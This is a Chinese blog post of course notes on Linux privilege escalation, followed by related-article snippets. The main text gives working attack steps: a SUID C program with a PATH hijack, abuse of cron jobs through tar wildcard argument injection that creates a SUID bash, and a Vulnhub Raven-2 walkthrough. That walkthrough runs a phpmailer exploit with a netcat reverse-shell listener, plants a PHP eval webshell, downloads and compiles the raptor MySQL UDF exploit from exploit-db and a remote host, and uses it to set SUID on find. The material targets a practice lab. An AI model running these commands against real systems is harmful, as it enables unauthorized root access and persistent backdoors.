权限提升-Linux定时任务&环境变量&数据库

最新推荐文章于 2023-04-18 00:33:44 发布
最新推荐文章于 2023-04-18 00:33:44 发布
阅读量296 收藏
点赞数
分类专栏: 小迪安全 权限提升 文章标签: linux mysql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44805159/article/details/120744506
版权

#案例1.Linux提权本地环境变量安全-本地
配合SUID进行环境变量提权-本地用户环境
手写调用文件-编译-复制文件-增加环境变量-执行触发

gcc demo.c -o shell
cp /bin/sh /tmp/ps
export PATH=/tmp:$PATH
./shell
id


demo.c

#include<unistd.h>
void main()
{
    setuid(0);
    setgid(0);
    system("ps");
}

image.png

  1. 路径问题
    1. 利用计划任务指向的文件的相对路径解析问题
cat /ect/crontab
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/xiaodi/test.sh
chmod +x /home/xiaodi/test.sh
/tmp/bash
  1. 命令问题
    1. 利用通配符配合命令参数自定义命令实现提权
    2. 不安全定时任务备份命令:
cd /home/undead/script;tar czf /tmp/backup.tar.gz *	#backup.sh
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/undead/script/test.sh
echo "" > "--checkpoint-action=exec=sh test.sh"
echo "" > --checkpoint=1
cd /tmp
./bash -p

https://www.cnblogs.com/manong–/p/8012324.html
test.sh

cp /bin/bash /tmp/bash; chmod +s /tmp/bash

image.png

  1. 权限问题
    1. 利用不安全的权限分配操作导致的定时文件覆盖
    2. chmod 777 775 等 所有者 组 其他成员说明

#案例3.Linux提权数据库MYSQL_UDF-Vulnhub
https://www.vulnhub.com/entry/raven-2,269/

Vulnhub 某靶机-探针 IP 及端口-利用漏洞获取 web 权限-信息收集-查看数据库配置文件-利用 Mysql 提
权 Linux(Mysql 版本区别同 Windows)
#探针 IP 及端口
nmap 192.168.76.0/24
#利用 phpmailer 漏洞进行修改并反弹
python D:/Myproject/40974.py
nc -lvvp 4444
#写入后门利用菜刀连接方便操作
echo '<?php eval($_POST[x]);?>' >1.php
上传信息收集脚本进行提权信息收集
./LinEnum.sh
翻阅数据库配置文件获取 root 密码
#利用 Mysql 提权 searchsploit
下载 mysql udf poc 进行编译
wget https://www.exploit-db.com/download/1518
mv 1518 raptor_udf.c
gcc -g -c raptor_udf.c
gcc -g -shared -o raptor_udf.so raptor_udf.o -lc
mv raptor_udf.so 1518.so
下载 1518 到目标服务器
wget https://xx.xx.xx.xx/1518.so
进入数据库进行 UDF 导出
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';
创建 do_system 函数调用
create function do_system returns integer soname '1518.so';
select do_system('chmod u+s /usr/bin/find');
#配合使用 find 调用执行
touch xiaodi
find xiaodi –exec "whoami" \;
find xiaodi –exec "/bin/sh" \;
id

#案例4.Linux提权提升简单总结归类-参考PDF

  1. 提权环境,信息收集(SUID,定时任务,可能漏掉,第三方服务应用等)
  2. 最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(四个脚本)
  3. 本地searchsploit脚本及远程exploitdb站点搜索说明(简要使用)
  4. 其他提权方法:密码复用,guid,sudo等说明(运气,同理,鸡肋等)

SUDO参考说明:https://www.freebuf.com/vuls/217089.html
**
考说明:https://www.freebuf.com/vuls/217089.html
**

雨雾_雨屋
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
权限提升】64 Linux 定时任务 环境变量 数据库
(∪.∪ )...zzz的博客
08-16 152
????) Linux提权 本地环境变量安全——Aliyun 配合SUID进行环境变量提权 本地用户环境 连接服务器,查看当前uid 手写调用 c代码 编译 gcc demo.c -o shell 复制文件 cp /bin/sh /tmp/ps 将sh可执行文件 复制到 ps可执行文件 增加环境变量 export PATH=/tmp:$PATH 执行触发 执行sh进入root Linux提权 本地定时任务安全——Aliyun 定时任务——计时任务 路径问题
提权—Linux 定时任务&环境变量&数据库
qi_SJQ_的博客
02-04 2845
Linux提权环境变量安全-(aliyun,本地): 前提:需要配合SUID进行环境变量提权且是本地用户环境下进行(因此比较难实现) 提权过程:手写调用文件-编译-复制文件-增加环境变量-执行触发。 //demo.c文件 #include&lt;unistd.h&gt; void main(){ setuid(0); setgid(0); system("ps"); } gcc demo.c -o shell //手写一个c语言文件,并上传编译为shell文件 cp /bin/sh ...
第64天:权限提升-Linux定时任务&amp;环境变量&amp;数据库1
08-03
1.提权环境,信息收集(SUID,定时任务,可能漏洞,第三方服务应用等) 2.最新相关漏洞要明确(关注点),二次开发相关脚本学会展望(四个脚本) 3.本地 se
第64天-权限提升-Linux 定时任务&环境变量&数据库
MCTSOG的博客
05-07 1024
思维导图 演示案例: Linux 提权本地环境变量安全-Aliyun 案例 1:Linux 提权本地环境变量安全-Aliyun 条件 配合 SUID 进行环境变量提权 本地用户权限 过程:手写调用文件-----编译------复制文件------增加环境变量------执行触发 gcc demo.c -o shell cp /bin/sh /tmp/ps export PATH=/tmp:$PATH ./shell id demo.c #include&lt;unistd.h&gt; void ma
linux crontab 定时任务配置用户环境变量
小刀的专栏
04-27 4998
定时任务crontab 配置调用shell脚本,脚本在客户端测试无误。 脚本1任务:远程在S3下载复制数据到HDFS,调用Spark集群分析分布式文件系统的数据输出到HDFS,调用hive加载分析完成的数据到特定的表。 异常现象:提示缺少hive的执行jar包。 脚本2任务:下载服务器日志数据到固定机器,在本地机器多线程清洗数据,完成之后load到HDFS。 异常现象
Linux下Oracle设置定时任务备份数据库的教程
09-09
首先,确保数据库字符集与Linux系统环境变量一致,这是防止备份过程中出现乱码的关键。 1. **确认字符集**: 在Oracle数据库中,可以通过SQL查询来查看字符集: ```sql select * from nls_database_parameters t...
权限提升-linux提权手法总结
01-14
### 权限提升-linux提权手法总结 #### 1. Linux提权概述 在Linux系统中,权限管理是一项至关重要的安全措施。用户被赋予不同级别的权限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
postgresql数据库定时备份脚本(linux)
07-14
3. **环境变量**:设置PGDATA、PGHOST、PGUSER、PGPASSWORD等环境变量,确保连接到正确的数据库实例。 五、设置定时任务 1. **编辑crontab**:`crontab -e` 命令打开编辑器。 2. **添加任务**:根据备份频率(如...
linux每天定时备份数据库并删除十天前数据详细步骤
09-15
总结,设置Linux定时备份数据库涉及的主要步骤包括编写备份脚本、创建备份目录、赋予脚本执行权限,以及配置cron定时任务。通过这些步骤,你可以确保数据库的持续安全性和可用性。在日常运维中,定期检查和测试备份...
linux定时任务设置环境变量,linux配置定时任务的用户环境变量
weixin_39553600的博客
05-04 1218
linux配置定时任务的用户环境变量在Linux系统中,执行定时任务时,默认加载的是用户环境变量 ~/.bashrc ,不会加载系统变量,而要使用系统变量,可以用如下方式:# Example of job definition:# .---------------- minute (0 - 59)# | .------------- hour (0 - 23)# | | .---------...
linux的定时任务怎么配置,Linux定时任务配置
weixin_35859336的博客
05-14 177
8种机械键盘轴体对比本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选?1.配置首先查看一下/etc/crontab文件:SHELL=/bin/bashPATH=/sbin:/bin:/usr/sbin:/usr/binMAILTO=rootHOME=/# For details see man 4 crontabs# Example of job definition:# .-------...
dc-5靶机渗透笔记
现代鲁滨逊的博客
05-12 267
1.发现主机 192.168.14.153 2.开启nmap端口扫描,开放了80,111,37620端口 3.访问站点,啥也没有 4.扫描后台文件,还是啥也没有 5. 然后看别人的笔记就是,每刷新一次thankyou.php,页尾的年份就会更新,别人扫出了个footer.php,推断出thankyou.php会包含footer.php,然后就猜想有文件包含漏洞,至于传递的参数是file应该是爆破出来的。 6. 尝试读取/etc/passwd文件 7.想尝试远程文件包含,但是不知道
setuid() 和 setgid()函数浅析
04-28 552
函数名 setuid - set user identity(设置用户ID) #include &lt;sys/types.h&gt;#include &lt;unistd.h&gt; 函数 int setuid(...
操作系统面试题目详解
Redemption___的博客
01-07 1316
文章目录1.13 什么是协程?1.14 为什么协程比线程切换的开销小?1.15 线程和进程的区别?1.16 进程切换为什么比线程更消耗资源?1.17 介绍一下进程之间的通信。1.18 介绍一下信号量。1.19 说说僵尸进程和孤儿进程。1.20 请介绍进程之间的通信方式。1.21 请介绍线程之间的通信方式。1.22 说一说进程的状态。1.23 CPU调度的最小单位是什么?线程需要CPU调度吗?1.24 进程之间共享内存的通信方式有什么好处?1.25 如何杀死一个进程?1.26 说一说kill的原理。1.27
Vulnhub-Gemini-Pentest-v1
weixin_44805159的博客
04-18 367
其中date命令没有写绝对路径,我们可以使用Linux环境变量提权,使用listinfo命令去执行我们编译的恶意date脚本,从而达到提权的目的。尝试读取shadow文件失败,读取root和gemini1下的bash_history失败,最后尝试读取/home/gemini1下的私钥文件。以上信息说明此程序为:这是一个内部web应用程序,旨在让员工查看他们的个人资料详细信息,并允许他们将自己的详细信息导出为PDF格式。功能点不多,登录退出,修改个人信息,导出文件等功能。将私钥文件保存为id_rsa文件。
靶机渗透练习43-Lord Of The Root
hirak0的博客
04-19 2093
靶机描述 靶机地址:https://www.vulnhub.com/entry/lord-of-the-root-101,129/ Description I created this machine to help others learn some basic CTF hacking strategies and some tools. I aimed this machine to be very similar in difficulty to those I was breaking on
Linux:添加环境变量
热门推荐
Yal_insist的博客
05-16 1万+
Linux:添加环境变量
Linux中添加系统环境变量
山路曲折盘旋,但毕竟朝着顶峰延伸
11-10 3165
Linux中添加系统环境变量 1, 添加临时环境变量。2, 添加永久环境变量
Linux下普通用户使用强制位获取root权限
Shad0wpf的博客
12-11 742
查找存在强制位的文件 find / -perm -4000 2&gt;/dev/null | xargs s -la 脚本编译 编写一个C脚本,内容如下: int main(void) { setuid(0); setgid(0); system("/bin/bash"); } 使用gcc编译 gcc getuid.c -o setuid #32位(报错时 apt install g...
linux系统oracle数据库手动备份
最新发布
07-25
回答: 在Linux系统中手动备份Oracle数据库,可以按照以下步骤进行操作。首先,登录到数据库的编辑模式,使用以下命令登录到SQL*Plus: &quot;sqlplus / as sysdba&quot;。然后,修改当前用户的权限,使用以下命令授予sysdba权限和imp_full_database权限给用户: &quot;grant sysdba to 用户名; grant imp_full_database to 用户名;&quot;。\[1\] 接下来,设置环境变量。因为crontab定时调用时,不会使用oracle用户的环境变量,所以需要将环境变量导入。可以在备份脚本中添加以下代码来设置环境变量: ``` export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1 export PATH=$ORACLE_HOME/bin:$PATH export LD_LIBRARY_PATH=$ORACLE_HOME/lib export NLS_LANG=AMERICAN_AMERICA.AL32UTF8 ``` 其中,ORACLE_HOME需要根据实际安装路径进行修改。\[2\] 然后,创建一个备份脚本。在脚本中,可以使用当前日期作为导出文件的文件名,并将导出的文件和日志文件打包成一个zip包,并删除这两个文件。以下是一个备份脚本的示例: ``` #!/bin/bash export ORACLE_SID=数据库实例名 export ORACLE_HOME=/u01/app/oracle/product/11.2.0/dbhome_1 export PATH=$ORACLE_HOME/bin:$PATH export LD_LIBRARY_PATH=$ORACLE_HOME/lib export NLS_LANG=AMERICAN_AMERICA.AL32UTF8 export BACKUP_DIR=/backup export DATE=$(date +%Y%m%d) export DUMP_FILE=$BACKUP_DIR/$DATE.dmp export LOG_FILE=$BACKUP_DIR/$DATE.log export ZIP_FILE=$BACKUP_DIR/$DATE.zip expdp 用户名/密码@数据库实例名 directory=DATA_PUMP_DIR dumpfile=$DUMP_FILE logfile=$LOG_FILE zip $ZIP_FILE $DUMP_FILE $LOG_FILE rm $DUMP_FILE $LOG_FILE ``` 其中,需要根据实际情况修改ORACLE_SID、ORACLE_HOME、BACKUP_DIR、用户名、密码和数据库实例名等参数。\[2\] 最后,可以将备份脚本设置为定时任务,以实现自动备份。可以使用crontab命令来设置定时任务,例如每天凌晨3点执行备份脚本: ``` crontab -e ``` 然后,在打开的编辑器中添加以下行: ``` 0 3 * * * /path/to/backup_script.sh ``` 保存并退出编辑器即可。这样,每天凌晨3点,备份脚本就会自动执行。\[2\] #### 引用[.reference_title] - *1* [Linux下备份oracle数据库](https://blog.csdn.net/li951383937/article/details/52475982)[target=&quot;_blank&quot; data-report-click={&quot;spm&quot;:&quot;1018.2226.3001.9630&quot;,&quot;extra&quot;:{&quot;utm_source&quot;:&quot;vip_chatgpt_common_search_pc_result&quot;,&quot;utm_medium&quot;:&quot;distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt&quot;}} ] [.reference_item] - *2* [怎样在Linux系统中备份Oracle数据库](https://blog.csdn.net/weixin_39658318/article/details/116388866)[target=&quot;_blank&quot; data-report-click={&quot;spm&quot;:&quot;1018.2226.3001.9630&quot;,&quot;extra&quot;:{&quot;utm_source&quot;:&quot;vip_chatgpt_common_search_pc_result&quot;,&quot;utm_medium&quot;:&quot;distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt&quot;}} ] [.reference_item] - *3* [linux环境下如何对oracle数据库进行整库备份](https://blog.csdn.net/weixin_42134097/article/details/116318942)[target=&quot;_blank&quot; data-report-click={&quot;spm&quot;:&quot;1018.2226.3001.9630&quot;,&quot;extra&quot;:{&quot;utm_source&quot;:&quot;vip_chatgpt_common_search_pc_result&quot;,&quot;utm_medium&quot;:&quot;distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt&quot;}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

雨雾_雨屋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值